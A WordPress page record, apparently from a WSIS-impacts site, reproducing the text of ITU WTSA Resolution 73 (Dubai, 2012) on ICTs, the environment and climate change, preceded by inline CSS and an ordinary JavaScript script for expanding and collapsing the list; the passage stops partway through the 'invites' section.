{"id":713,"date":"2013-06-18T22:36:01","date_gmt":"2013-06-19T02:36:01","guid":{"rendered":"http:\/\/internetdistinction.com\/wsisimpacts\/?page_id=713"},"modified":"2015-06-30T00:32:53","modified_gmt":"2015-06-30T04:32:53","slug":"wtsa_73","status":"publish","type":"page","link":"https:\/\/internetdistinction.com\/wsisimpacts\/wsis\/wtsa\/wtsa-2012\/wtsa_73\/","title":{"rendered":"WTSA Resolution 73"},"content":{"rendered":"<p><style type=\"text\/css\">\r\nbody {}\r\n\r\n:link { color: #0000ff; text-decoration:none;}\r\n:visited { color: #6666ff; text-decoration:none; }\r\na:active { color: #0000ff; text-decoration:none;}\r\na:hover {color: #0000ff; text-decoration:underline; }\r\n\r\ndiv.basetext {}\r\n\r\ndiv.basetop {}\r\n\r\nh1 {\r\n    text-align:center;\r\n}\r\n\r\nspan.h2 {}\r\n\r\ndiv.year {}\r\n\r\ndiv.form {}\r\n\r\nspan.cpt {}\r\n\r\nspan.cm {}\r\n\r\n.fl {}\r\n\r\nul {}\r\n\r\nli {}\r\n\r\nul li {}\r\n\r\nli.basic {}\r\n\r\nspan.links {}\r\n\r\n\r\n\r\n\r\n.sub { display: none; }\r\n.subexp {display: block; }\r\n.sub { display: none; } \r\n\r\n.subexp {display: block; } \r\n\r\nli.exp {\r\n  cursor:pointer;\r\n}\r\n\r\nli.col {\r\n  cursor:pointer;\r\n}\r\n\r\nli.exp_active {\r\n  background-color:#eeeeff;\r\n  cursor:pointer;\r\n}\r\n\r\nli.col_active {\r\n  background-color:#eeeeff;\r\n  cursor:pointer;\r\n}\r\n\r\n\r\nli.basic_active {\r\n  background-color:#eeeeff;\r\n}\r\n<\/style><br \/>\n<SCRIPT language=JavaScript>\r\nfunction get_keycode(evt) {\r\n  \/\/ IE\r\n    code = document.layers ? evt.which\r\n           : document.all ? event.keyCode \/\/ event.keyCode!=evt.keyCode!\r\n           : evt.keyCode;\r\n\r\n  if (code==0) \r\n    code=evt.which; \/\/ for NS\r\n  return code;\r\n}\r\n\r\nvar lastnode=null;\r\nvar listnodes = null;\r\nvar list_index=1;\r\nvar lastnodetype=''; \/\/ determines if node is a link, input or text;\r\n\r\n\/\/ up, left, down, right, keypress codes\r\n\/\/ijkl\r\n\/\/var keys = new Array(105,106,107,108);\r\n\/\/num arrows\r\n\/\/var keys = new Array(56,52,50,54);\r\n\/\/wasd\r\n\/\/ var press2 = new Array(119,97,115,100);\r\n var press = new Array(47,45,42,43);\r\n\r\n\/\/ keydown codes\r\n  \/\/  var keys2=new Array(87,65,83,68);\r\n  var keys= new Array(38,37,40,39);\r\n\r\n  \/\/ keyset 1 = keydown, otherwise press\r\nfunction checkup(keyset,n) {\r\n  if (keyset==1) return (n==keys[0]);\r\n  return ((n==press[0]) \/*|| (n==press2[0])*\/)\r\n}\r\n\r\nfunction checkdn(keyset,n) {\r\n  if (keyset==1) return (n==keys[2]);\r\n  return ((n==press[2]) \/*|| (n==press2[2])*\/)\r\n}\r\n\r\nfunction checkl(keyset,n) {\r\n  if (keyset==1) return (n==keys[1]);\r\n  return ((n==press[1]) \/*|| (n==press2[1])*\/)\r\n}\r\n\r\nfunction checkr(keyset,n) {\r\n  if (keyset==1) return (n==keys[3]);\r\n  return ((n==press[3]) \/*|| (n==press2[3])*\/)\r\n}\r\n\r\n\r\n\r\n\r\n\r\nfunction is_exp(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='exp') || (n.className=='exp_active'));\r\n}\r\n\r\nfunction is_col(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='col') || (n.className=='col_active'));\r\n}\r\n\r\nfunction is_basic(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='basic') || (n.className=='basic_active'));\r\n}\r\n\r\n\r\n\r\n\/* returns i>=0 if true *\/\r\nfunction is_active(node) {\r\n  if (node.className==null) return false\r\n  return node.className.indexOf('_active');\r\n}\r\n\r\nfunction toggle_class(node) {\r\n  if ((node==null) || (node.className==null)) return;\r\n  str=node.className;\r\n  result=\"\";\r\n  i = str.indexOf('_active');\r\n  if (i>0)\r\n    result= str.substr(0,i);\r\n  else\r\n    result= str+\"_active\";\r\n  node.className=result; \r\n  return node;\r\n}\r\n\r\nfunction activate(node) {\r\n  node.style.backgroundColor='#eeeeff';\r\n}\r\n\r\nfunction deactivate(node) {\r\n   node.style.backgroundColor='#ffffff';\r\n}\r\n\r\nfunction is_list_node(n) {\r\n  if (n==null) return false;\r\n  if (n.className==null) return false;\r\n  if ( (is_exp(n)) || \r\n       (is_col(n)) ||\r\n       (is_basic(n)) )\r\n   return true; else return false;\r\n}\r\n\r\n\r\nfunction get_href(n) {\r\n  alist=n.attributes;\r\n  if (alist!=null) {\r\n    hr = alist.getNamedItem('href');\r\n    if (hr!=null) return hr.nodeValue;\r\n  }\r\n  if (n.childNodes.length==0) return '';\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_href(n.childNodes[i]);\r\n    if (s!='') return s;\r\n  }\r\n  return '';\r\n}\r\n\r\nfunction get_link(n) {\r\n  if (n==null) return null;\r\n  if (n.style==null) return null;\r\n\r\n \/\/ disabling uncontrolled recursion to prevent error messages on IE\r\n \/\/ when trying to focus to invisible links (readonly mode)\r\n\/\/    alert(n.nodeName+' '+n.className);\r\n  if ((n.nodeName=='UL') && (n.className=='sub')) return null;\r\n\r\n  if (n.nodeName=='A') return n;\r\n  if (n.childNodes.length==0) return null;\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_link(n.childNodes[i]);\r\n    if (s!=null) return s;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction set_lastnode(n) {\r\n\/*var d = new Date();\r\nvar t_mil = d.getMilliseconds();*\/\r\n\/\/ testattu nopeuksia explorerilla, ei merkitt\u00e4vi\u00e4 eroja\r\n  if (lastnode==n) return; \r\n\/*  deactivate(lastnode)\r\n  lastnode=n;\r\n  activate(lastnode);*\/\r\n\r\n  if (is_active(lastnode)>=0)\r\n    toggle_class(lastnode);\r\n  lastnode=n;\r\n  if (!(is_active(lastnode)>=0))\r\n    toggle_class(lastnode);\r\n\r\n\r\n\/*var d2 = new Date();\r\nvar t_mil2 = d2.getMilliseconds();\r\n  window.alert(t_mil2-t_mil);*\/\r\n}\r\n\r\nfunction next_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex<listnodes.length-1) {\r\n    tempIndex++;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\nfunction prev_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex>0) {\r\n    tempIndex--;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\n\r\n\r\nfunction getsub (li) {\r\n  if (li.childNodes.length==0) return null;\r\n  for (var c = 0; c < li.childNodes.length; c++)\r\n    if ( (li.childNodes[c].className == 'sub') || (li.childNodes[c].className == 'subexp') ) \r\n      return li.childNodes[c];\r\n}\r\n\r\nfunction find_listnode_recursive (li) {\r\n  if (is_list_node(li)) return li; \r\n  if (li.childNodes.length==0) return null;\r\n  result=null;\r\n  for (var c = 0; c < li.childNodes.length; c++) {\r\n    result=find_listnode_recursive(li.childNodes[c]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction next_child_listnode(li) {\r\n  var result=null;\r\n  for (var i=0; i<li.childNodes.length; i++) {\r\n    result=find_listnode_recursive(li.childNodes[i]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;  \r\n}\r\n\r\nfunction next_actual_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction next_sibling_listnode(li) {\r\nif (li==null) return null; \r\n var result=null;\r\n  var temp=li;\r\n  if (is_col(temp)) return next_child_listnode(temp);\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction last_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var last=null;\r\n  while(1) {\r\n    var n = temp.nextSibling;\r\n    if (is_list_node(temp)) \r\n      last = temp;\r\n    if (n==null) {\r\n      if (is_col(last)) return last_sibling_listnode(next_child_listnode(last));\r\n      else return last;\r\n    }\r\n    temp = n;\r\n  }\r\n}\r\n\r\nfunction prev_sibling_listnode(li) { \r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var n = null;\r\n  while (1) { \r\n    n = temp.previousSibling;\r\n    if (n==null) {\r\n      return parent_listnode(li);\r\n    }\r\n    if (is_list_node(n)) {\r\n      if (is_col(n)) { \r\n        return last_sibling_listnode(next_child_listnode(n));\r\n      }\r\n      else {\r\n        return n;\r\n      }\r\n    }\r\n    temp=n;\r\n  }\r\n}\r\n\r\n\r\nfunction parent_listnode(li) {\r\n  \/\/ added 12.7.2004 to prevent IE error when readonly mode==true\r\n  if (li==null) return null;\r\n  n=li;\r\n  while (1) {\r\n    n=n.parentNode;\r\n    if (n==null) return null;\r\n    if (is_list_node(n)) return n;\r\n  }\r\n}\r\n\r\nfunction getVisibleParents(id) {\r\n  var n = document.getElementById(id);\r\n  while(1) {\r\n    expand(n);\r\n    n = parent_listnode(n);\r\n    if (n==null) return;\r\n  }\r\n}\r\n\r\nfunction onClickHandler (evt) {\r\nif (lastnode==null) \r\n{\r\nlistnodes = document.getElementsByTagName('li');\r\nlastnode=listnodes[1];\r\ntemp=listnodes[1];\r\n}\r\n\r\n\r\n  var target = evt ? evt.target : event.srcElement;\r\n  if (!is_list_node(target)) return;\r\n  toggle(target);\r\n  set_lastnode(target);\r\n}\r\n\r\n\r\nfunction expand(node) {\r\n    if (!is_exp(node)) return;\r\n    if (node.className=='exp_active') \r\n      node.className='col_active';\r\n    else \r\n        node.className='col';\r\n    setSubClass(node,'subexp');\r\n    \/\/    getsub(node).className='subexp';\r\n}\r\n\r\nfunction collapse(node) {\r\n  if (!is_col(node)) return;\r\n  \r\nif (node.className=='col_active')\r\n    node.className='exp_active'\r\n  else \r\n    node.className='exp';\r\n\r\n setSubClass(node,'sub');\r\n\/\/  getsub(node).className='sub';\r\n\r\n}\r\n\r\nfunction setSubClass(node,name) {\r\n  sub = getsub(node);\r\n  if (sub==null) return;\r\n  sub.className=name;  \r\n}\r\n\r\nfunction toggle(target) {\r\n  if (!is_list_node(target)) return;\r\n    if (is_col(target)) {\r\n      target.className='exp';\r\n      setSubClass(target,'sub');\r\n      \/\/      getsub(target).className='sub';\r\n    }\r\n    else if (is_exp(target)) {\r\n      target.className='col';\r\n      setSubClass(target,'subexp');\r\n      \/\/      getsub(target).className='subexp';\r\n    }\r\n \r\n}\r\n\r\nfunction expandAll(node) {\r\n    if (node.className=='exp') {\r\n        node.className='col';\r\n        setSubClass(node,'subexp');\r\n\/\/        getsub(node).className='subexp';\r\n    }\r\n    var i;\r\n    if (node.childNodes!=null) \r\n\/\/    if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            expandAll(node.childNodes[i]);\r\n}\r\n\r\nfunction collapseAll(node) {\r\n    if  (node.className=='col') {\r\n        node.className='exp';\r\n        setSubClass(node,'sub');\r\n\/\/        getsub(node).className='sub';\r\n    }\r\n    var i;        \r\n    if (node.childNodes!=null) \r\n\/\/ for opera   if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            collapseAll(node.childNodes[i]);\r\n}\r\n\r\n\r\n\r\nfunction unFocus(node) {\r\n     \/\/ unfocuses potential link that is to be hidden (if a==null there is no link so it should not be blurred).\r\n     \/\/ tested with mozilla 1.7, 12.7.2004. \/mn (\r\n      intemp=parent_listnode(node);  \r\n      a = get_link(intemp);     \/\/ added 6.4. to get keyboard working with\r\n      \/\/ moved before collapse to prevent an error message with IE when readonly==true      \r\n      if (a!=null) a.blur(); \/\/ netscape after collapsing a focused node\r\n      return intemp;\r\n}\r\n\r\n\/\/ mode: 0==keypress, 1==keyup\r\nfunction keyfunc(evt,mode) {\r\n var c = get_keycode(evt);\r\n var temp = null;\r\n var a = null;\r\n\r\n  if (lastnode==null) {\r\n    listnodes = document.getElementsByTagName('li');\r\n    lastnode=listnodes[1];\r\n    temp=listnodes[1];\r\n  }\r\n\r\n  \/\/window.alert(c);\r\n  if (checkup(mode,c)) { \/\/ i \r\n   temp=prev_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkdn(mode,c)) { \/\/ k\r\n    temp=next_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkr(mode,c)) { \/\/ l\r\n    expand(lastnode);\r\n    \/\/  temp=next_child_listnode(lastnode);\r\n    \/\/ if (temp==null) {\r\n      a = get_link(lastnode);\r\n        if (a!=null) a.focus(); else self.focus(); \r\n      \/\/}\r\n  }\r\n  else if (checkl(mode,c)) { \/\/ j\r\n    if (is_col(lastnode)) {\r\n      unFocus(lastnode);\r\n      collapse(lastnode);\r\n    }\r\n    else {\r\n      temp=unFocus(lastnode);\r\n      collapse(temp);\r\n    }\r\n   \/\/    if (temp==null) lastnode.focus(); \/\/ forces focus to correct div (try mozilla typesearch) (doesn't seem to work -mn\/6.4.2004)\r\n  }\r\n  else return;\r\n  if (temp!=null) set_lastnode(temp);\r\n\r\n  \/\/ alert('pressed ' + String.fromCharCode(c) + '(' + c + ')');\r\n  return true;\r\n}\r\n\r\n\r\nfunction keytest (evt) {\r\n  return keyfunc(evt,1);\r\n};\r\n\r\n\r\nfunction presstest (evt) {\r\n  return keyfunc(evt,0);\r\n};\r\n\r\n\r\n  document.onclick = onClickHandler;\r\n  document.onkeypress = presstest;\r\n  document.onkeyup = keytest;\r\n<\/SCRIPT><\/p>\n<h3><span style=\"\">WTSA RESOLUTION 73 (Rev. Dubai, 2012)<\/span><\/h3>\n<h4><span style=\"\">Information and communication technologies, environment and climate change<\/span><\/h4>\n<p><span style=\"\">The World Telecommunication Standardization Assembly (Dubai, 2012),<\/span><\/p>\n<ul class=\"subexp\">\n<li class=\"exp\" style=\"\"><span style=\"\">recalling<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        Resolution 35 (Kyoto, 1994) of the Plenipotentiary Conference, on telecommunication support for the protection of the environment;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        Resolution 1307 (Geneva, 2009) of the ITU Council, on information and communication technologies (ICTs) and climate change;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        Resolution 182 (Guadalajara, 2010) of the Plenipotentiary Conference, on the role of telecommunications\/ICTs in regard to climate change and the protection of the environment;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)        Resolution 1353 (Geneva, 2012) of the Council, which recognizes that telecommunications and ICTs are essential components for developed and developing countries1 in achieving sustainable development, and instructs the Secretary-General, in collaboration with the Directors of the Bureaux, to identify new activities to be undertaken by ITU to support developing countries in achieving sustainable development through telecommunications and ICTs,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">considering<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        that the issue of the environment, including climate change, is rapidly emerging as a global concern and requires global collaboration;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        that the United Nations Intergovernmental Panel on Climate Change (IPCC) estimated that global greenhouse gas (GHG) emissions had risen by more than 70 per cent since 1970, having an effect on global warming, changing weather patterns, rising sea-levels, desertification, shrinking ice cover and other long-term effects;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        that ITU, at the United Nations Conference on Climate Change in Bali, Indonesia, on 3-14 December 2007, highlighted the role of ICTs as both a contributor to climate change, and an important element in tackling the challenge;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)        the work being undertaken following agreements to the Bali, Roadmap, Cancun Agreements and Durban Platform and the importance of reaching international agreement on an effective post-2012 outcome;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">e)        the role that ICTs and ITU can play in contributing to the implementation of such agreements;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">f)        the importance of promoting sustainable development and the ways in which ICTs can enable clean development;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">g)        the initiatives taken in some regions;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">h)        that the e-waste African programme under the Basel Convention (Annexes VIII and IX) is a comprehensive programme initiative aiming to enhance the environmental governance of e-waste and to create favourable social and economic conditions for partnerships and small businesses in the recycling sector in Africa,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">considering also<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        ITU Telecommunication Standardization Sector (ITU-T) Technology Watch Briefing Report No. 3 (2007), which highlighted the issue of climate change and the role of ICTs;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        in addition to the work in ITU-T, the ITU Radiocommunication Sector (ITU-R) and ITU Telecommunication Development Sector (ITU-D) initiatives in considering climate change and the role of ICTs;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        that ITU Recommendations focusing on energy-saving systems and applications can play a critical role in the development of ICTs;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)        the leadership of ITU-R, in collaboration with the ITU membership, in identifying the necessary radio-frequency spectrum for climate monitoring and disaster prediction, detection and relief, including the establishment of cooperative arrangements with the World Meteorological Organization (WMO) in the field of remote-sensing applications;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">e)        the report entitled &#8220;Strategy for a climate-neutral United Nations&#8221;, prepared by the Environment Management Group, and the endorsement by the Chief Executives Board (CEB) in October 2007 of the strategy committing the United Nations system to attain climate neutrality;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">f)        the standards-development activities on ICTs and climate change by, for example, relevant ITU-T study groups in work related to ubiquitous sensor networks (USN), which allow the detection, storage, processing and integration of situational and environmental information gathered from sensor devices connected to telecommunication networks;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">g)        the outcomes of the symposia on &#8220;ICTs and Climate Change&#8221;;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">h)        the activities and outcomes of the Focus Group on ICTs and Climate Change from July 2008 to April 2009;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">i)        that ITU-T Study Group 5 has led development of relevant standards to facilitate low-carbon ICTs and promote the adoption of low-carbon ICTs in other industries;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">j)         the responsibilities of Study Group 5, as the lead study group for study of the ICT environmental aspects of electromagnetic phenomena and climate change, including design methodologies to reduce environmental effects, such as recycling related to ICT facilities, equipment, etc.;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">k)         the work in the Joint Coordination Activity on ICT and Climate Change under ITU-T Study Group 5,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">considering further<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        the outcome document adopted by Rio+20, entitled &#8220;The Future We Want&#8221;, reflecting the renewed commitment to advancing sustainable development and achieving environmental sustainability;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        that the outcome document recognizes that ICTs are facilitating the flow of information between governments and the public, highlighting the need to continue working towards improved access to ICT, especially broadband networks and services, and to bridge the digital divide, recognizing the contribution of international cooperation in this regard;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        that the Rio+20 conference has called for further mainstreaming of the three dimensions of sustainable development throughout the United Nations system, inviting UN specialized agencies to consider appropriate measures for integrating the social, economic and environmental dimensions across the UN system&#8217;s operational activities and to support developing countries upon request to achieve sustainable development,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">noting<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        that, in the report of the conclusions from the 2008 Global Standards Symposium (GSS), it was recognized that the ICT industry and its members can set an example by committing to specific programmes, with objectives, that reduce overall GHG emissions (e.g. the power consumption of ICT devices) and to ensuring that the expansion of the global communications network is done in an environmentally-friendly manner;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        the outcomes of the conferences of the United Nations Framework Convention on Climate Change (UNFCCC);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        the Dynamic Coalition on Internet and Climate Change;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)        that there are other international forums that are working on climate-change issues with which ITU should cooperate,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">recognizing<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        that ICTs can make a substantial contribution to mitigating and adapting to the effects of climate change;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        that ICTs play a vital role in tackling environmental challenges such as climate change, e-waste, deforestation, lack of access to energy, energy consumption and biodiversity, by supporting basic scientific research, which has helped to bring the issue of climate change into the public domain and to raise awareness of future challenges;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        that a future high-bandwidth, lower-carbon information society offers a platform for economic, social and cultural development that is sustainable;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)        that the adverse effects of climate change may be uneven in their impact and may fall disproportionately on the most vulnerable countries, mainly the developing countries, given their limited capacity to adapt;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">e)        that ICTs contribute approximately 2 &#8211; 2.5 per cent of GHG emissions, which may grow as ICTs become more widely available;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">f)        that ICTs can, however, be a major mitigating factor in efforts to moderate climate change and to limit and ultimately reduce GHG emissions and energy consumption through, for example, the development and introduction of energy-efficient devices, applications and networks;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">g)        that the use of ICTs as a key component of energy-efficient work methods could include the reduction of emissions through, for example, paperless meetings, virtual conferencing, teleworking, etc., which in turn would be beneficial in terms of reducing the need to travel;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">h)        that, as an actual case study, the Virtual International Symposium on ICTs and Climate Change was co-organized by ITU and Korea Communications Commission (KCC);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">i)        that ICTs are essential for climate monitoring, data gathering and rapid information transfer relating to risks of climate change, and that adequate telecommunication networks are essential in ensuring that communications reach people and the appropriate relief organizations;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">j)        that ICTs, through the development of smart grids, can enable wider access to electricity, better management of energy distribution, in particular in developing countries, and full exploitation of renewable sources;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">k)        that, since the energy consumption of the Internet, data centres and always-on connected devices will continue to grow, cloud computing is a critical enabling technology that can lead to energy efficiencies and accelerate the transition for countries and companies to a low-carbon economy;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">l)        that climate change endangers the quality and availability of water and food, by causing severe storms, heatwaves, droughts and floods, while worsening the quality of air;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">m)        that better water management using ICTs improves the overall efficiency of water use, leading to significant savings and more sustainable use of water resources;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">n)        that the widespread use of electrical and electronic equipment (EEE) has raised public awareness of its positive effects, such as reduction of the digital divide, but also of the negative environmental and health effects associated with inefficient waste management of end-of-life electrical and electronic equipment (WEEE or e-waste),<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">resolves<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1        to continue and further develop the ITU-T work programme initially launched in December 2007 on ICTs and climate change, as a high priority, in order to contribute to the wider global efforts to moderate climate change, as part of the United Nations processes;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2        to take into account the progress already made in the international symposia on ICTs, environment and climate change, held in various parts of the world2, by distributing their outcomes as widely as possible;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3        to continue to maintain and update the ITU-T Global Portal on ICTs, environment and climate change, extending its features by developing an electronic and interactive forum to share information and to disseminate ideas, standards and best practices on the relationships between ICTs and environmental sustainability, experiences and practices for disclosure, labelling schemes and recycling facilities;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">4        to promote the adoption of Recommendations for enhancing the use of ICTs to serve as a potent and cross-cutting tool to assess and reduce GHG emissions, optimize energy and water consumption, minimize e-waste and improve its management across economic and social activities;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">5        to increase awareness and promote information sharing on the role of ICTs in enhancing environmental sustainability, in particular by promoting the use of more energy-efficient3 devices and networks and more efficient working methods, as well as ICTs that can be used to replace or displace higher energy consuming technologies\/uses;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">6        to work towards the reductions in emissions of GHGs arising from the use of ICTs that are necessary to meet the goals of UNFCCC;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">7        to work towards a reduction of the adverse environmental impact of environmentally unfriendly materials used in ICT products;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">8        to bridge the standardization gap by providing technical assistance to countries to develop their national green ICT action plans, and develop a reporting mechanism in order to support countries in implementing their plan;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">9        to set up e-learning programmes on Recommendations related to ICT, the environment and climate change,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">instructs the Telecommunication Standardization Advisory Group<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1        to coordinate the activities of ITU-T study groups in relation to their review of relevant standardization activities of other standards developing organizations (SDOs) and facilitate collaboration between ITU and those SDOs in order to avoid duplication of, or overlap in, international standards, through in particular the JCA on ICT and climate change;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2        to ensure that study groups carry out a review of both the appropriate existing ITU-T Recommendations and all future Recommendations to assess their implications and the application of best practices in the light of the protection of environment and climate change;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3        to consider further possible changes to working procedures in order to meet the objective of this resolution, including extending the use of electronic working methods to reduce the climate-change impact, such as paperless meetings, virtual conferencing, teleworking, etc.,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">instructs all ITU-T study groups<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1        to cooperate with Study Group 5 to develop appropriate Recommendations on ICTs, the environment and climate-change issues within the mandate and competency of ITU-T, including telecommunication networks used for monitoring and adapting to climate change, for example disaster preparedness, signalling and quality of service issues, taking into account any economic impact on all countries and in particular on developing countries;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2        to identify best practices and opportunities for new applications using ICTs to foster environmental sustainability, and to identify appropriate actions;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3        to liaise with the relevant ITU-R and ITU-D study groups and promote liaison with other standards development organizations and forums in order to avoid duplication of work, optimize the use of resources and accelerate the availability of global standards,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">instructs the Director of the Telecommunication Standardization Bureau, in collaboration with the Directors of the other Bureaux<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1        to report on progress on the application of this resolution annually to the ITU Council and to the 2016 world telecommunication standardization assembly;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2        to keep up to date the calendar of events relevant to ICTs, the environment and climate change based on proposals by TSAG and in close collaboration with the other two Sectors;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3        to launch pilot projects, aimed at bridging the standardization gap, on environmental sustainability issues, in particular in developing countries;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">4        to support the development of reports on ICTs, the environment and climate change, taking into consideration relevant studies, in particular the ongoing work of Study Group 5, including issues related to, inter alia, green data centres, smart buildings, green ICT procurement, cloud computing, energy efficiency, smart transportation, smart logistics, smart grids, water management, adaptation to climate change and disaster preparedness, and how the ICT sector contributes to annual reductions in GHG emissions, and submit the reports as soon as possible to Study Group 5 for its consideration;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">5        to organize workshops and seminars for developing countries, to raise awareness and identify their particular needs and challenges on environment and climate-change issues;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">6        to report on progress of the ITU\/WMO\/UNESCO IOC Joint Task Force to investigate the potential of using submarine telecommunication cables for ocean and climate monitoring and disaster warning;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">7        to promote the ITU-T Global Portal on ICTs, environment and climate change and its use as an electronic forum for exchange and dissemination of ideas, experience and best practices on ICTs, the environment and climate change;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">8        to report to TSAG on the progress regarding invites the Secretary-General below,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">invites the 